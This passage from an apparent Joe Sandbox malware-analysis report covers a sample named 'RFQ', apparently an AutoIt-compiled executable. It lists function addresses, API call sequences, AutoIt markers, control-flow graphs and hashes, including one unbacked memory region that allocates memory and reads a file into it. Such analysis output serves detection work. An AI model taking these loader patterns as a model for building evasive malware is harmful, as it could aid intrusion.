                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                          • API String ID: 3948761352-1609664196
                                                                          • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                          • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                          Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                          • String ID: Include$\
                                                                          • API String ID: 3173733714-3429789819
                                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                          Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                          • _free.LIBCMT ref: 00452A17
                                                                          • _free.LIBCMT ref: 00452A20
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1255752989-0
                                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                          Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                          • String ID: FILE
                                                                          • API String ID: 3888824918-3121273764
                                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                          Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • ImageList_ReplaceIcon.COMCTL32(00ADF330,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                          Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00ADF330,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                          Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc
                                                                          • String ID: Default
                                                                          • API String ID: 1579825452-753088835
                                                                          • Opcode ID: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                          • Opcode Fuzzy Hash: 8d6a693bc28ede282e6a55fdab6cf0c37e3d7becfc9ec4ad637a350fdd6cb948
                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                          Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1054 40f5c0-40f5cf call 422240 1057 40f5d0-40f5e8 1054->1057 1057->1057 1058 40f5ea-40f613 call 413650 call 410e60 1057->1058 1063 40f614-40f633 call 414d04 1058->1063 1066 40f691 1063->1066 1067 40f635-40f63c 1063->1067 1070 40f696-40f69c 1066->1070 1068 40f660-40f674 call 4150d1 1067->1068 1069 40f63e 1067->1069 1074 40f679-40f67c 1068->1074 1071 40f640 1069->1071 1073 40f642-40f650 1071->1073 1075 40f652-40f655 1073->1075 1076 40f67e-40f68c 1073->1076 1074->1063 1077 40f65b-40f65e 1075->1077 1078 425d1e-425d3e call 4150d1 call 414d04 1075->1078 1079 40f68e-40f68f 1076->1079 1080 40f69f-40f6ad 1076->1080 1077->1068 1077->1071 1091 425d43-425d5f call 414d30 1078->1091 1079->1075 1082 40f6b4-40f6c2 1080->1082 1083 40f6af-40f6b2 1080->1083 1084 425d16 1082->1084 1085 40f6c8-40f6d6 1082->1085 1083->1075 1084->1078 1087 425d05-425d0b 1085->1087 1088 40f6dc-40f6df 1085->1088 1087->1073 1090 425d11 1087->1090 1088->1075 1090->1084 1091->1070
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                          • String ID: AU3!$EA06
                                                                          • API String ID: 1268643489-2658333250
                                                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                          Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1094 401100-401111 1095 401113-401119 1094->1095 1096 401179-401180 1094->1096 1098 401144-40114a 1095->1098 1099 40111b-40111e 1095->1099 1096->1095 1097 401182 1096->1097 1100 40112c-401141 DefWindowProcW 1097->1100 1102 401184-40118e call 401250 1098->1102 1103 40114c-40114f 1098->1103 1099->1098 1101 401120-401126 1099->1101 1101->1100 1105 42b038-42b03f 1101->1105 1111 401193-40119a 1102->1111 1106 401151-401157 1103->1106 1107 40119d 1103->1107 1105->1100 1110 42b045-42b059 call 401000 call 40e0c0 1105->1110 1108 401219-40121f 1106->1108 1109 40115d 1106->1109 1112 4011a3-4011a9 1107->1112 1113 42afb4-42afc5 call 40f190 1107->1113 1108->1101 1116 401225-42b06d call 468b0e 1108->1116 1114 401163-401166 1109->1114 1115 42b01d-42b024 1109->1115 1110->1100 1112->1101 1119 4011af 1112->1119 1113->1111 1121 42afe9-42b018 call 40f190 call 401a50 1114->1121 1122 40116c-401172 1114->1122 1115->1100 1120 42b02a-42b033 call 4370f4 1115->1120 1116->1111 1119->1101 1126 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1119->1126 1127 4011db-401202 SetTimer RegisterWindowMessageW 1119->1127 1120->1100 1121->1100 1122->1101 1130 401174-42afde call 45fd57 1122->1130 1127->1111 1128 401204-401216 CreatePopupMenu 1127->1128 1130->1100 1145 42afe4 1130->1145 1145->1111
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                          • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                          Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1146 4115d7-4115df 1147 4115ee-4115f9 call 4135bb 1146->1147 1150 4115e1-4115ec call 411988 1147->1150 1151 4115fb-4115fc 1147->1151 1150->1147 1154 4115fd-41160e 1150->1154 1155 411610-41163b call 417fc0 call 41130a 1154->1155 1156 41163c-411656 call 4180af call 418105 1154->1156 1155->1156
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • std::exception::exception.LIBCMT ref: 00411626
                                                                          • std::exception::exception.LIBCMT ref: 00411640
                                                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                          • String ID: ,*H$4*H$@fI
                                                                          • API String ID: 615853336-1459471987
                                                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                          Function 04032678 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1165 4032678-4032726 call 4030048 1168 403272d-4032753 call 4033588 CreateFileW 1165->1168 1171 4032755 1168->1171 1172 403275a-403276a 1168->1172 1173 40328a5-40328a9 1171->1173 1180 4032771-403278b VirtualAlloc 1172->1180 1181 403276c 1172->1181 1174 40328eb-40328ee 1173->1174 1175 40328ab-40328af 1173->1175 1177 40328f1-40328f8 1174->1177 1178 40328b1-40328b4 1175->1178 1179 40328bb-40328bf 1175->1179 1184 40328fa-4032905 1177->1184 1185 403294d-4032962 1177->1185 1178->1179 1186 40328c1-40328cb 1179->1186 1187 40328cf-40328d3 1179->1187 1182 4032792-40327a9 ReadFile 1180->1182 1183 403278d 1180->1183 1181->1173 1188 40327b0-40327f0 VirtualAlloc 1182->1188 1189 40327ab 1182->1189 1183->1173 1190 4032907 1184->1190 1191 4032909-4032915 1184->1191 1192 4032972-403297a 1185->1192 1193 4032964-403296f VirtualFree 1185->1193 1186->1187 1194 40328e3 1187->1194 1195 40328d5-40328df 1187->1195 1196 40327f2 1188->1196 1197 40327f7-4032812 call 40337d8 1188->1197 1189->1173 1190->1185 1198 4032917-4032927 1191->1198 1199 4032929-4032935 1191->1199 1193->1192 1194->1174 1195->1194 1196->1173 1205 403281d-4032827 1197->1205 1201 403294b 1198->1201 1202 4032942-4032948 1199->1202 1203 4032937-4032940 1199->1203 1201->1177 1202->1201 1203->1201 1206 403285a-403286e call 40335e8 1205->1206 1207 4032829-4032858 call 40337d8 1205->1207 1212 4032872-4032876 1206->1212 1213 4032870 1206->1213 1207->1205 1215 4032882-4032886 1212->1215 1216 4032878-403287c CloseHandle 1212->1216 1213->1173 1217 4032896-403289f 1215->1217 1218 4032888-4032893 VirtualFree 1215->1218 1216->1215 1217->1168 1217->1173 1218->1217
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04032749
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0403296F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                                                                          • Instruction ID: d5bd68f7ebf449815d101f1f835b63391d38fa37d4f6768f314fad8b63f93939
                                                                          • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
